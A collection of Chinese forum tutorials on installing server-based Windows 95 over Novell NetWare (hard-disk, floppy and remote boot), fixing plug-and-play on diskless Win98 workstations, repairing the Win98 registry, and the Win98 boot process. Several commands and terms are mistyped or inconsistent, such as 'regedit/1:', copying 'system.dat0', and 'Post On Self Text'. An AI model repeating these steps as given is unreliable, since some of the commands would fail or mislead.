有 Client Shell 也不成. 下面 "Prefered Server" 要填装上 95 的

Server (比如 lwared) "Enable Logon Script Pre....." 是否要起动 Login

Script看随意而 Script 中不能有载入 TSR Command Line!! 最後一项也是最最最重要的

"Enable Server Based Setup" 选 "Hard Disk Boot" <---一定要选!!!如果啥都没选,

Setup 会原封不动把 95 拷到 Local HD.(嗯...安装 95 也不一定要 CD-ROM, 这种方法也

可以装, 且也不问序号)在 "Installation Options" 里 "Type of Installation" 选越少

越好 (有 "通用""携带" "最少" "自定") 理由为何? 因为在 Novell Server 仍然对 "中文

" 长文件名"敏感", 偏偏资料夹是中文, 在安装盘二次起动时会根据先前 Setup 的 Folder

搜索Server 上的对应程序及 Folder 填回 Client 所设定 Client-95 目录, 由於敏感(根

本找不到 MSBatch.inf 指定的程序 or Folder) 就 Hang 在那... 真的当机且不告诉任何

讯息, 不像 "正常" 95 当机时最起码有个对话框 or "蓝蓝的萤幕", 因为这阶段还在

"Real Mode", 因此当掉方式跟 DOS 没两样...:( 等全部装成功再由"控制台" "新增应用程

序" 加入就可以 (装好 95 却可以... ?), 反正程序已在Server 上跑不掉的). 奇怪的是同

样情形以 NT 安装却不会发生, 不晓得这 BUG 算M$ or Novell?

"Installation Directory" 里填要装 Server Based 95 的目录, 比如 c:\net95

千万不要填回 server\share-95 (装回 server).

其它的选项看须要设, 比如 TCP/IP...... 并不会严重影响安装成功失败.离开前一定要记

得存文件, 且要存回 server\share-95 目录.且文件名用MSBatch.inf,

理由同前所述.

(到此已算是完成 2/4, 但这阶段最重要, 所有安装都看 MSBatch.inf 设定.)

2.95 从 Clinet 安装

正式由 Client 端来装 95, 如一般用 DOD Novell Client Shell, Login Novell

Server.

cd \netwin.95 (server上 \share-95 目录)

setup [enter] (其实是setup mabatch.inf)

就可以看到 Client & Sever HD 一起"哀号"

ps.一般网络卡卡上都附有 LED 接脚,建议把 Client 面盘上的 "POWER" LED 接到

卡上 (或者任何 LED), 在传输中会像小星星般闪烁, 为何要这样作? 安装过程都是

Real Mode (很慢......), 到盘三次起动时 Real & Protected Mode 切来切去(更

慢!)有时候如同当掉, 其实没当, 唯一的依据是网络讯号 (在哪里会如此我会提出来),如果

超过 6 分钟没有闪 (HD 灯不准), 我 Client 是 P-120 就等过 6 分钟, 其它类推.网络卡

背後一定有 LED (没 LED 自己看著办), 不然安装时就躲在电脑後面看 LED.

如果在 Batch.exe "Installation Options" | Set.. | Don't Stop Druing Setup

有选的话.从打 Setup 到 "重新起动" 只须一个键 "版权声明" Yes or No.(注：一般不要

选"|Don't Stop During Setup",而选"|Stop at Every Page",因为有时会通不过，如我安

装时在 硬件检测时通不过，后来减少了硬件的检测项时才通过。)

(注:在点了Finish后可能会不Reboot,而出现

Invalid DPMI return form xxxx:xxxx,

这不要紧,用Ctrl+Alt+Del或Reset重启动即可.)

下列是 "最乾净" 的 Autoexec.bat & Config.sys.

由於 HD-Boot 的 95 所建的 Config & Autoexec 是依照原旧 DOS 的 Config &

Autoexec 所以没有预设值.

config.sys

device=c:\net95\himem.sys

device=c:\net95\emm386.exe

autoexec.bat

c:\net95\snapshot /S

c:\net95\net start NWRedir

c:\net95\net use * /d

c:\net95\net use W: \\LWARED\SYS

SET PATH=c:\net95;W:\NETWIN.95\;W:\NETWIN.95\COMMAND;

set tmp=c:\net95

set temp=c:\net95

如有 95 尚未支持的周边(SCSI, CDROM...) 在上列两文件加上.

如 95 有支持就尽量保持 "乾净".

再 Reboot, HD 轰隆一阵子, 等输入 ID & Pass(注：你在Novell 上的帐号及密码) , 而後

Client & Server HD 又开始抓狂.在 "第一次起动" 画面後, 屏幕一片黑暗而且会很久,那

是在 RegEdit System，也许隔了一分钟 LED 才闪一下...

神啊!! 请赐我大无畏的耐性让我能平安渡过是漫漫的 Setup, 并佑我不要抓狂与电

脑"玉碎"!!!....!!!...

而後如 "正常" 装 95一般, "检视应硬件随插随用", "组织控制台..."...到了 "启动工具

列设定" 以後又停住了, 不明原因, 可能又是 Novell 对中文长文件名敏感所引起. 再

等......(同样情形对 NT 却不会) 到了设定 Exchange 完毕後重新Reboot, 哈哈完了吗?

才 3/4 而已!

最後一次 Reboot, 在 "蓝天白云" 之後又挂了很久, 真的要切到 Protected Mode.

进入 "真正" 95 画面, 才算是完完全全装好 Server Based 95. 以後开机并不会有

如此惊心动魄的等待, 如同 Real 95 一般.

Yea!

三种 Boot 中, HD-Boot 对 Server 负担最轻, Swap 仍然在 Local HD. 但是现在

HD如此便宜, HD-Boot 好像不切实际, 对资源统一安全管理没啥意义. 再来是Floppy-Boot

& RPL, 这两种除了不占本地空间外, 有一个最大的特色 --- "WorkStation维护". 只要有

各 Workstation 的 95 目录备份. 当某一台 95 挂了(乱装软件,乱砍东西,乱设定...), 还

原备份就可以回复备份前样子. 这对动不动又要重装的 95 特别有用, 尤其各 Workstation

目录内容没有几 MB(都是组态设定文件), 维护起来方便多了

返回目录

第二.FLOPPY_BOOT的Client设定

Floppy-Boot 大部份与 HD-Boot 大同小异, 只是多了一个步骤.

1.设定Client端的Script文件(即mabatch.inf文件)

上一 Post 有提到任何 Boot 完全是看 MSBatch.inf(在 Server 上 95 目路录中),

设定 MSBatch.inf 就是以 Batch.exe 来设定. 作完後储存档名自然是MSBatch.inf,

Batch.exe 画面很清楚, 问填啥就填啥, 所有设定都是针对 Client 而言, 比如

Computer Name 填 Client 可不要填成 Server 名称, 其中重点在 "Network Options" &

"Installation Options"

在 "Network Options" 里 IPX/SPX Compatiable Protocol 一定要打 "勾", 我们

要Login Novell Server 当然要走 IPX/SPX, Frame 预设是 Automatic, 也可以选

802.2 or 802.3 看 Server 是用何框架. 在左边有 "Client for Netware Network" 也一

定要打 "勾", 光有 Network Protocol 没有 Client Shell 也不成. 下面 "Prefered

Server" 要填装上 95 的 Server(比如 lwared) "Enable LogOn Script Pre..."是否要起

动 Login Script, 看随意而 Script 中不能有载入 TSR Command Line!!

最後一项也是最最最重要的

"Enable Server Based Setup" 选 "Floppy Boot" <---一定要选!!

如果啥都没选, Setup 会原封不动把 95 拷到 Local HD.

大部份的设定与 HD-Boot 一样, 只有下列一个选项与 HD-Boot 不同.

注意::: "Installation Directory" 里填要装 Server Based 95 的目录,比如

w:\user\cwin95-1, 千万不要填回 server\share-95(装回 Server 上共用 95 的目

录)在 95 的 Network.txt 中有提到,共享 95 的目录与各 Clients 目录要在同一

Server没试过跨 Server 会发生何种问题.(fiften注:W盘可以和share-95目录在同一个盘,

也可以不一样,但是必须是你能有写,创建文件等权限的盘,如果不是同一个盘,以后必须手工

在autoexec.bat中加入net use w: \\server\卷名)

其它的选项看须要设, 比如 TCP/IP... 并不会严重影响安装成功失败. 离开前一定

要记得存档, 且要存回 server\share-95 目录.且档名用 MSBatch.inf, 理由同前所

述.

(到此已算是完成 2/4, 但这阶段最重要, 所有安装都看 MSBatch.inf 设定.)

2.设定Server端的INI文件(即machinese.ini文件)

由於系统组织档都在 Server 上, 95 起动後会作 Registry 动作(就是画面说"系统

组织中", 所以要指定 95 的目录. 在 "正常" 的 95(含 HD-Boot)是在 MSDOS.SYS 中

WinDir= , WinBootDir= , HostWinBootDrv= . 而 Floppy-Boot(& RPL) 也有

System.dat(95 的 Registry 档), 按 95 RK 说这是 "mini" 版的 Registry 只负

责启动用的, 还须要告诉真正的 Registry 所在.

在 \share-95(Server 上共享 95 目录)有一个 Machines.ini 就是设定各 Clients

的 Registry 所在(很像 Novell 的 bootconf.sys) 格式如下:

;Windows 95 MACHINES.INI

;[node address]

;SYSDATPATH=x:\<home directory>

;x=\\server\share

[0000b4752312] <--- 网路卡号, 可以用 Userlist /a 看到

SYSDATPATH=w:\user\cwin95-1 <--- Server 上此台把 95 装在的目录

"(不是 shared-95 目录哟)"

G:=\\LWARED\sys <--- 其他对应磁碟, 相当於 Novell "MAP"

H:=\\LWARED\app

:

:

[0000b4321234] <--- 另一台

SYSDATPATH=w:\user\rpl-95a

:

:

======================================================================

这部份要在执行 "Setup" 前作好, 否则第一次重开会发生 Registry 错误.

(fiften注：其实这个文件什么时侯改都可以，因为Machines.ini 实际上是

由setmdir(Set Machine Directory)读取并解释的)。

3. 95 从 Clinet 安装

正式由 Client 端来装 95, 如一般用 DOS Novell Client Shell, Login Novell

Server.cd \netwin.95 (server上 \share-95 目录)setup [enter]

这次就只看到 Server 的 HD "哀号"

如果在 Batch.exe "Installation Options" | Set.. | Don't Stop Druing

Setup 有选的话.从打 Setup 到 "重新起动" 只需一个键 "版权声明" Yes or No.

(fiften注：一般不要选"|Don't Stop During Setup",而选"|Stop at Every

Page",因为有时会通不过，如我安装时在 硬件检测时通不过，后来减少了硬件的检测项时

才通过。)

安装中在最後一定会要求放入 95 启动片(不是"救急片"),会作 Format 及 Copy 动

作.如果没有, 重新作 Batch.exe 动作看 "Enable Server Based Setup" "Floppy Boot"

<--- 是否有选!!

(注:在点了Finish后可能会不Reboot,而出现Invalid DPMI return form xxxx:xxxx,

这不要紧,用Ctrl+Alt+Del或Reset重启动即可.)

通常 3-5 分钟, 就重新起动. ~~ 不要马上再执行 95 开机动作 ~~

以下是 Floppy 内含档案及 Autoexec.bat 内容, 如果有特殊硬体要 DOS Driver

同样在这磁片作设定.

Files List(预设值)

======================================================================

ASPI2HLP.SYS CMD640X.SYS CMD640X2.SYS DBLBUFF.SYS

HIMEM.SYS IFSHLP.SYS NDISHLP.SYS NE2000.DOS

NET.EXE NET.MSG PROTMAN.DOS PROTMAN.EXE

SETMDIR.EXE SNAPSHOT.EXE SETVER.EXE PROTOCOL.INI

IO.SYS AUTOEXEC.BAT COMMAND.COM

Autoexec.bat(预设值)

snapshot /S /R

net start NWRedir

net use * /d

net use W: \\LWARED\SYS

PATH=W:\NETWIN.95\;W:\NETWIN.95\COMMAND

setmdir <--- 就是比 HD-Boot 多一行,要作 Registry 的.

最好顺便检查 MSDOS.SYS

[Paths]

WinDir=w:\user\cwin95-1

WinBootDir=A:\

HostWinBootDrv=A

[Options]

BootMulti=1

BootGUI=1

Network=1

LoadTop=0

======================================================================

而後过程与 HD-Boot 完全一样.

返回目录

第三. Remote_Boot Clinet 端设定

1.设定Client端的Script文件(即mabatch.inf文件)

利用Batch.exe来设定.Batch.exe 画面很清楚, 问填啥就填啥, 所有设定都是针

对Client 而言, 比如Computer Name: 填 Client 可不要填成 Server 名称, 其中重

点在 "Network Options" & "Installation Options"

在 "Network Options" 里 IPX/SPX Compatible Protocol 一定要打 "勾", 我们

要Login Novell Server 当然要走 IPX/SPX, Frame 预设是 Automatic, 也可以选

802.2 or 802.3 看 Server 是用何协议. 在左边有 "Client for Netware Network" 也一

定要打"勾", 光有 Network Protocol 没有 Client Shell 也不成.

注意：：：：

网络设定部份,必须要在这阶段完全设定好, 不能在起动成功後的 95 再设定.

如 Client Shell, Protocol, Service...

下面 "Prefered Server" 要填装上 95 的 Server(比如 lwared)

"Enable LogOn Script Pre....."是否要起动 Login Script, 看随意而 Script

中不能有载入 TSR Command Line!!

最後一项也是最最最重要的

"Enable Server Based Setup" 选 "Remote Boot" <--- 一定要选!!如果啥都没选, Setup

会原封不动把 95 拷到 Local HD.

大部份的设定与前二种一样,只有下列一个选项不同

"Installation Directory" 里填要装 Server Based 95 的目录, 比如

w:\user\rpl-95a 千万不要填回 server\share-95(装回 Server 上共用 95 的目

录).在 95 的 Network.txt 中有提到, 共享 95 的目录与各 Clients 目录要在同一

Server. 没试过跨 Server 会发生何种问题.(注:W盘最好和share-95目录在同一个盘,不然

会找不到,因为好像Setup只自动在autoexec.bat中加入一个net use)

离开前一定要记得存文件, 且要存回 server\share-95 目录. 且文件名用

MSBatch.inf,理由同前所述.

(到此已算是完成 2/4, 但这阶段最重要, 所有安装都看 MSBatch.inf 设定.)

2.设定Server端的INI文件(即machinese.ini文件)

由於系统组织文件都在 Server 上, 95 起动後会作 Registry 动作 (就是画

面说 "系统组织中", 所以要指定 95 的目录. 在 "正常" 的 95 (含 HD-Boot) 是在

MSDOS.SYS中 WinDir= , WinBootDir= , HostWinBootDrv= 而 Floppy-Boot(& RPL) 也有

System.dat (95 的 Registry 文件), 按 95 RK 说这是 "mini" 版的 Registry

只负责起动用的, 还须要告诉真正的 Registry 所在.

在 \share-95 (server 上共享 95 目录) 有一个 Machines.ini 就是设定各

Clients的 Registry 所在 (很像 Novell 的 Bootconf.sys), 格式如下:

;Windows 95 MACHINES.INI

;[node address]

;SYSDATPATH=x:\<home directory>

;x=\\server\share

[0000b4752312]

SYSDATPATH=w:\user\cwin95-1 (不要写成SYSDATAPATH=...)

G:=\\LWARED\sys ^

H:=\\LWARED\app

:

:

[0000b4321234] <--- 网络卡号, 可以用 Userlist /a 看到

SYSDATPATH=w:\user\rpl-95a <--- Server上此台把 95装在的目录 "(不是 shared-95 目

录哟)"

p:=\\nw2\sys <--- 其他对应磁盘, 相当於 Novell "MAP"

:

:

这部份要在执行 "Setup" 前作好, 否则盘一次重开会发生 Registry 错误.

(fiften注：其实这个文件什么时侯改都可以，因为Machines.ini 实际上是

由setmdir(Set Machine Directory)读取并解释的)。

3. 95 从 Clinet 安装

执行 Setup 前确定此台 Workstation 是 "真正" 无盘的 Remote-Boot.

如果非如此,则在 ImageFile 中并没有 Ramdrive.sys(虚拟磁盘).

所以最好也是 Boot-ROM 开机後再执行 "Setup"

以 Boot-ROM 开机.

cd \netwin.95 (server上 \share-95 目录)setup [enter](注：此处应为 setup

/t:p:\temp /is /id p为你的网络盘，

/is /id可选可不选，但/t必选，不然会出现"Can not load Progman",就退出了)

这次就只看到 Server 的 HD "哀号"

如果在 Batch.exe "Installation Options" | Set.. | Don't Stop

Druing Setup 有选的话. 从打 Setup 到 "重新起动" 只须一个键 "版权声明"

Yes or No.(注：一般不要选"|Don't Stop During Setup",而选"|Stop at Every

Page",因为有时会通不过，如我安装时在 硬件检测时通不过，后来减少了硬件的检测项时

才通过。)

(注:在点了Finish后可能会不Reboot,而出现

Invalid DPMI return form xxxx:xxxx,

这不要紧,用Ctrl+Alt+Del或Reset重启动即可.)

在上一个阶段完成後, 安装程序会产生 net$dos.sys 在 Server 中 Client 安装的

目录 (ex:\user\rpl-95a) 下. 找另一台 Client 把这 net$dos.sys 拷到 Server 的

\login下. 这步骤最好要考虑一下, 不一定每一台 RPL Client 通通都是 95 开机

最好搭配 "Bootconf.sys" 为特定 Client, 指定 ImageFile. 所以换个名再拷过来

并且搭配 Bootconf.sys, 而 Bootconf.sys 设定参照 Novell 手册.

Server 上有了 95 的 ImageFile, 可以用 Boot-ROM 开机.

下列是 ImageFile 中的文件案(预设值):

======================================================================

ASPI2HLP.SYS WIN.BAT CMD640X.SYS

CMD640X2.SYS DBLBUFF.SYS HIMEM.SYS

IFSHLP.SYS NDISHLP.SYS NE2000.DOS

NET.EXE NET.MSG NWRPLTRM.COM

PROTMAN.DOS PROTMAN.EXE RAMDRIVE.SYS

RPLBOOT.SYS SETMDIR.EXE SNAPSHOT.EXE

SETVER.EXE SYSTEM.DAT IO.SYS

CONFIG.SYS AUTOEXEC.BAT MSDOS.SYS

COMMAND.COM PROTOCOL.INI

C 盘里 \winboot 中的 config.sys & autoexec.bat

config.sys(预设值):

DEVICE=HIMEM.SYS

DEVICE=ramdrive.sys 1440 /e <---这一行一定要有, 因为 95

要由 DOS 7 启动, 而 client 不一定有 HD, 所以造一个虚拟磁盘.

AUTOEXEC.BAT(预设值):

@if not exist C:\winboot\nul mkdir c:\winboot

copy a:\system.dat c:\system.dat

@copy a:\ C:\winboot

会把 A (即 ImageFile) 所有资料拷到这 C 的 \winboot

C:

cd \winboot

当 95 跑完 Autoexec.bat 後应该会马上执行 Win.com 但是网络连结 (Real-Mode)

还没作, 所以多了 Win.bat

WIN.BAT(预设值):

set comspec=c:\winboot\command.com

nwrpltrm <--- 比 Floppy-Boot 多了这一行

snapshot /S /B:C

net start NWRedir

net use * /d

net use W: \\LWARED\SYS

PATH=W:\NETWIN.95\;W:\NETWIN.95\COMMAND

setmdir <--- Floppy & RPL 特有的一行

win.com

==================================================================

这三篇文章即是以 RPL Workstation 95(32 mb) 打的, 在 Server Load 还算轻的时候, 效率还不错, 但是连 Swapper 都在 Server 的 Server Based 95 Client 多一点连上 Server, 那真的要有 "傲人" 的耐性. 非不得已, 不要把 Swapper(Paging) 设到Server 上.也尽量不要同时一堆 Server Based 95 同时开机(真的有得等...),有人曾问我把整个教室的 Clients 都用 Remote-Boot 启动 95?

您说呢?......

我想不是学生被 Down, 是老师 Down 掉... :P

事后的处理:Paging File 的考虑

95 会作 "硬盘置换文件", 而且不小, 几台还无所谓, 多了 Clients 拼命在

Server 上作 Paging(Swap), 尤其某一台 95 RAM 特别小, 那大家不要作事了...

RAM 小的 95 尽量用 HD-Boot.或者分摊 Paging File 给其它 Server.

但是先在 Machines.ini 中设定其它 Server 对应到的"磁盘", 如:

[0000b4752312]

SYSDATPATH=w:\user\cwin95-1

H:=\\LWARED\app

p:=\\NW2\app <--- P: 盘在 NW2 的 app volume 上

在 Client 95 目录下编辑 System.ini 其中有一行

Pagingfile=p:\swapper\swapper.dat 把 Swapper 改到 P 盘上的 \swapper 下

文件名随意(不能"长文件名"), ~注意~ 如有其它 Clients 设同目录, 文件名需

不同!!

以此方法减轻 Share-95 Server 的负担, 这地方设定最好 Client-95 装好再作

返回


PNP无盘工作站启动后不能提示找到新硬件的解决

《一键清理系统垃圾》

PNP无盘工作站启动后不能提示找到新硬件的解决

大家在根据一些网上资料在进行pnp无盘98的安装时，往往会出现一些问题，并且多数贴在网上的资料都只讲解了pnp过程中最重要的“无中断网卡的驱动方法”及一些必要的文件的替换，很多都忽略了一个步骤，这样会造成，工作站在硬件配置不同时，虽然可以正常启动进入98桌面，但时却并不能自动的提示发现新硬件，并安装驱动程序。

经整理解决方式如下：
1.我们一般都是用LITNET1.15的demo版上传的,这就必须要改一下LITENET.REG文件，这个文件会在你执行litnet 时重启之后，上传之前自动产生在你的c:\windows\ 目录中：
找到如下这一段：
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\CONFIGMG]
"SYSDMFunc"="WinMain"
这项删掉,这就是litnet 故意做的一个手脚。

2.你的系统已经上传调试好了，才发现的问题也可以直接在工作的注册表中把这个键值修改：

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\CONFIGMG]
"StaticVxD"="*CONFIGMG"
"SysDMFunc"="DMSetupDevnode"

最后重要的一步，你可能发现上传之后的98 系统无法打开“系统属性”这个面板，解决方法简单，你可以把样板机上的c:\windows\SYSDM.CPL 文件复制到你的上传98系统的共享目录windows 中，就可以正常的打开“系统属性”面板，并在其中进行硬件设置驱动的删除、更新了，以上方法仅供参考，如您有什么更好的方法或不同异见，请指正交流。


去掉win98启动登陆框

《一键清理系统垃圾》

去掉win98启动登陆框

1\打开“控制面板”??“网络”将“主网络登录”选择为“windows登录”即可
2\YES~~如果看不见的话..就要先安装"windows 友好登临" 客户. 添加--客户--windows 友好登临

win98安装
win98安装时，那7个漏装的虚拟设备驱动程序是什么？？怎么安装啊？？？？
Win98/Me考虑到兼容性,并不安装这些驱动，但使用它们，性能可能会有得到提高。
confingmg.vxd　　　 vfat.vxd　　　 vcache.vxd　　vdd.vxd　　　vdmad.vxd
vmouse.vxd　　 ntkern.vxd　　　vflatd.vxd

如果你自己找不到，就下载一个新点的超级兔子，他里面有

网络用户可以登陆到主机
友好登陆是为多用户设计的，每个帐号登陆上去的个人爱好设置是不一样的
WINDOWS好象就是网吧用的拉~~啥都没

作为Windows 98操作系统的配置信息，Windows 98注册表直接控制着Windows 98的启动、硬件驱动程序的安装和运行。启动计算机时，均会在屏幕上见到大部分读软硬件的设置信息过程。 但只有出现设备不能正常初始化或Windows不正常启动时， 查阅注册表的过程才会提示：“Windows不能访问注册表”、“系统内存不足”的出错信息。

    通常情况下，注册表损坏时，重新启动计算机后Windows 98会自动恢复工作，这实际上也是Windows 98比Windows 95性能更稳定之处，点击对话框中的“Restore From Backup and Restart”(使用备份文件恢复并重新启动机器)按钮即可恢复Windows自动备份的系统注册表文件。但当重新启动计算机后仍无效时，可采用下述方法进行恢复。

    方法一、手工还原注册表修复法

    关闭Windows 98系统，重新启动计算机到MS－DOS方式，转到Windows目录下，依次键入下列命令，然后回车：

    Attrib －h －r －s system.dat

    Attrib －h －r －s system.da0

    Copy system.dat0 system.dat

    Attrib －h －r －s user.dat

    Attrib －h －r －s user.da0

    Copy user.da0 user.dat

    重新启动即可。
    上述过程实际上就是先修改system.dat和user.dat两个文件的属性，然后用system.da0和user.da0两个文件覆盖，就可将注册表还原。
    当对Windows进行手工修改后出现问题，则可将整个注册表导出到一个文件。键入“regedit/c registry.txt”，回车，即可使用文本编辑器来打开所创建的文本文件，保存文件并退出即可。
    若不需要恢复注册表而只是想要合并修改的信息时，则可使用“registry.txt”而不需要加“/c”参数。如果这个方法产生的文本文件大于编辑器内容，可采用将一个注册表导出到几个文本文件，再分别导入。
方法二、启动盘修复法
    用启动盘重新启动计算机，然后在DOS提示符下运行Regedit.exe命令，以引入REG备份文件。将User.dat文件导出到文本文件，在DOS命令行键入：
    regedit/1:C\Windows\user.dat/e C:\user.txt
    其中“/e”选项表示导出，“/1”选项表示正在操作的注册表的某一个部分，重新命名存在的user.dat文件，键入：ren user.dat user.bak
    最后，使用如下命令来根据导出的文本文件重建user.dat文件。
    regedit/1:C\windows\user.dat/c C:\user.txt
    Windows 98的用户需要在用“/r”替代“/1”。 但Windows 98需要使用“/c”参数来从文本文件中恢复注册表。重新启动操作系统，查看是否已经恢复正常。若故障依旧，则可对注册表的system.dat文件执行同样的操作。重新启动并选择安全模式下的命令行，使用如下命令来恢复system.dat文件：
    regedit/1:C:\Windows\system.dat/e C:\System.txt
    方法三、系统备份修复法
    在DOS命令状态下，将文件system.dat、system.da0重新命名，键入：
    ren system.dat system.dat.bak
    ren system.da0 system.da0.bak
    然后将这些文件拷贝到Windows目录下。如：如果您的备份文件在“C:\Backup”下，键入命令：
    copy C:\Backup\System.dat C:\Windows
    注意该命令可能因为文件实际所在的位置而有所不同，回车后重新启动完成。若仍不行时，对用户备份文件user.dat和user.da0执行同样的操作。
方法四、自带工具修复法
    1、Windows 98安装光盘上Other\Misc\ERU文件夹中有一个名为ERU.EXE的紧急事故恢复工具，它不但可备份和恢复注册表，还可恢复Autoexec.bat、Config.sys、IO.sys、MSDOS.sys、Command.com等文件，注意将备份文件最好置于软盘，在装有ERU.EXE备份文件的软盘上运行ERU.EXE命令来对注册表进行恢复。
    若上述方法仍无效时，打开C盘根目录下的一个名为System.ist文件，它是安装Windows 98时记录所有计算机软硬件信息的文件系统，用它覆盖C:\Windows\system.dat文件即可。
    2、利用自带的ScanRegW工具软件进行恢复。直接在“运行”中键入ScanRegW，选“Yes”备份系统注册表，目的是对正常运行的系统进行一个最新备份。一旦系统崩溃，首先用KV300杀毒软件进行杀毒处理，确保系统处于正常环境之中。进入DOS环境，运行ScanRegW，当出现“Check Your Registry”时，选择“Start”，程序开始检查系统文件。检查完毕后弹出“Good Registry”窗口，选择“View Backups……”查看备份文件列表，ScanReg将列出5个注册表备份文件及其备份日期，选中最新的一个备份再选择“Restore……”进行恢复。若不能成功恢复，请重新选“View Backups……”中的备份文件。恢复成功退出ScanReg程序。重新启动计算机，Windows 98恢复。
    方法五、其它修复法
    使用Windows安装过程中创建的system.1st来恢复system.dat。在命令行状态下，回到根目录，键入：
    attrib －s －h －r system.1st
    copy C:\System.1st C:\Windows\system.dat


windows98启动过程。基础知识了。

《一键清理系统垃圾》

windows98启动过程。基础知识了。

(一)、BIOS的启动过程

只要一打开计算机的电源开关，一个叫Bootstrap(引导程序)的小软件就要发挥作用，
它常驻在BIOS ROM的地址FFFFOH处,当ROM加载程序加载它后，它就完成下面的几项工
作。

1、加电自检

POST（Post On Self Text，加电自检子程序）测试系统的完整性，如果系统通过测试
，计算机扬声器发出一短促的鸣叫声（是否有鸣叫声取决于BIOS的厂家，这里以广泛使
用的Award的BIOS为例），如果系统出现故障而未通过测试，根据故障的不同扬声器将
发出不同的鸣叫声，因为各个厂商对鸣叫声的定义不同，要了解各个鸣叫声的意义需查
看BIOS或者主板厂商的用户手册。某些BIOS在检测出系统故障时会暂停并且在显示器上
显示出相关的错误信息（如键盘错误等）。在POST过程还要测试内存的完整性。

2、检测即插即用设备

3、查找引导盘

引导程序接着检测BIOS中的设置以找到第一个可引导的驱动器（一般为A盘或C盘），如
果在检测完BIOS中指定的所有可引导器仍未发现引导驱动器，引导程序暂停启动过程并
显示一个错误信息：找不到启动盘。

（二）、Dos的启动过程

操作系统加载程序从ROM加载程序得到控制权后就开始DOS的启动，其步骤如下。

1、加载IO.SYS

操作系统加载程序从引导驱动器上读取主引导记录MBR（Master Boot Record）并将控
制权叫给MBR，MBR读取分区表（在MBR的尾部）并找到引导分区的位置，MBR将控制权叫
给引导分区的引导扇区（引导扇区包含磁盘引导程序和磁盘特性表）上的磁盘引导程序
，检测BIOS参数块（BPB，BIOS Parameter Block）以找到操作系统引导文件所在的根
目录，将操作系统引导文件IO.SYS从根目录拷贝进内存，IO.SYS实际上是一个可执行文
件并且只能位于引导分区的第一磁道上。

2、加载FAT和MSDOS.SYS

3、处理CONFIG.SYS和AUTOEXEC.BAT

如果CONFIG.SYS文件不存在，IO.SYS从MSDOS.SYS的“WinBootDir=”获得Ifshlp.sys、
Himem.sys和Setver.exe这三个文件的位置，然后自动加载这三个必需的驱动程序。如
果MSDOS.SYS中有BootGUI=0这个选项，IO.SYS将控制权交给命令行解释器COMMAND.COM
（或者叫给CONFIG.SYS中由命令“SHELL=”指定的命令行解释器），然后COMMAND.COM
将控制权叫给计算机用户，也就是等待用户输入DOS命令，至此DOS的启动过程完成。

（三）、Windows的启动过程

在DOS启动过程的最后一步，如果MSDOS.SYS中是BootGUI=1而不是BootGUI=0这个选项，
IO.SYS将控制权将交给Windows加载程序以继续加载Windows，Windows的启动过程真正
开始。

1、显示“Starting Windows...”

屏幕显示“Starting Windows 9x...”这个提示信息，在这个信息显示的过程中：

MSDOS.SYS中的BootDelay=n（n为整数）选项可以控制该信息的显示延长时间，若
MSDOS.SYS没有该选项，默认该信息显示3秒。

若MSDOS.SYS中有BootKeys=1，按住Ctrl或F8键则显示Windows启动菜单。若有
BootMenu=1，不按住Ctrl或F8键也会自动显示Windows启动菜单。

MSDOS.SYS中若有BootMenuDelay=n的选项，可以指定Windows启动菜单显示的延长时间
，默认是30秒。

MSDOS.SYS中若有BootMenuDefault=n，可以指定Windows启动菜单上的启动项，默认是1
，即以正常模式启动Windows。

如果Windows上一次没有正常关闭，而且在MSDOS.SYS中没有AutoScan=0选项，磁盘扫描
程序Scandisk将询问或者自动扫描硬盘，默认该选项是AutoScan=1，既自动扫描。

不管MSDOS.SYS中是否有以上选项，只要Windows上一次的启动或关机过程没有正常完成
，Windows的启动菜单会自动出现，而且默认启动项是安全模式（Windows Safe Mode）
，这个自动出现的启动菜单其显示延时是30秒。

在Windows的启动过程中，将保留所有的UMB（Upper Memory Block，上位内存）使用。

2、检测Windows的启动画面

如果MSDOS.SYS中有logo=1选项或者没有该选项，IO.SYS加载并显示其内部默认的
Windows启动画面（即蓝天白云画面）。用户可自定义一个LOGO.SYS文件（实际上是分
辨率为320?400、颜色深度为256色的BMP图形）并把它放在根目录下一取代该画面，这
样Windows的启动画面就变成了用户的自定义画面。可能有些计算机用户这样做后发现
显示的仍然是蓝天白云画面，这种情况发生在OEM版的Windows中，原因是微软为这些
OEM厂商修改了LOGO.SYS必须放在特定的目录中，例如C:\WINDOWS或者别的目录中，不
同的OEM厂家可能有所不同。

在MSDOS.SYS设置logo=0则不显示Windows的启动画面。

3、检测DRVSPACE.INI和DBLSPACE.INI文件

如果存在DRVSPACE.INI和DBLSPACE.INI文件，并且在MSDOS.SYS中没有指定DblSpace=0
、Drvspace=0，DRVSPACE.BIN和DBLSPACE.BIN被加载。

4、检测注册表

IO.SYS打开注册表文件SYSTEM.DAT并调用其它工具检测数据的有效性，如果文件
SYSTEM.DAT不存在，则自动从备份文件中恢复该文件，如果SYSTEM.DAT被恢复，
USER.DAT也被自动恢复。Windows98中备份文件被压缩在目录C:\WINDOWS\SYSBACKUP\下
的RB00n.CAB中，n的值为0―5。

5、检测DBLBUFF.SYS

如果在MSDOS.SYS中有DoubleBuffer=1，或者注册表中有键值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WinBoot\DoubleBuffer，则
加载DBLBUFF.SYS。即使以上两个条件都没有满足，但是Windows探测到双缓冲（
Double Buffer）是必须的，也会自动加载双缓冲。

6、加载WIN.COM

配置文件加载完成后即运行WIN.COM，WIN.COM是Windows的加载器（Windows Loader）
，由它继续Windows的启动工作。

7、加载Vxd文件

Vxd其全称为Virtual Device Driver，即虚拟设备驱动程序。WIN.COM首先处理
VMM32.VXD。

实模式虚拟设备驱动程序加载程序检测是否所需的VxD文件已成功加载，如果没有，它
再一次尝试加载。一旦实模式虚拟设备驱动程序加载成功，设备初始化开始。任何需要
在实模式下初始化的VxD文件此时开始初始化。VMM32将计算机处理器从实模式切换到保
护模式，VxD第三阶段的初始化过程开始。在这个阶段VxD设备驱动程序根据InitDevice
指定的次序而不是根据VxD被加载进入到内存中的次序进行初始化，这些VxD文件初始化
次序如下。

a.SYS_CRITICAL_INIT(SYSCRITINIT,系统关键初始化）

在这个阶段为了让VxD文件有足够多的时间准备设备初始化而不被系统中断，所有的系
统中断都被关闭，所有的文件输入/输出（I/O）也被关闭，因此所有的VxD文件被加载
的过程不被Windows启动记录文件Boot.txt记录，直到该初始化过程完成之后，所有VxD
文件被加载的过程才被记录到文件Bootlog.txt中。

b、SYS_DEVICE_INIT(DEVICEINIT,系统设备初始化）

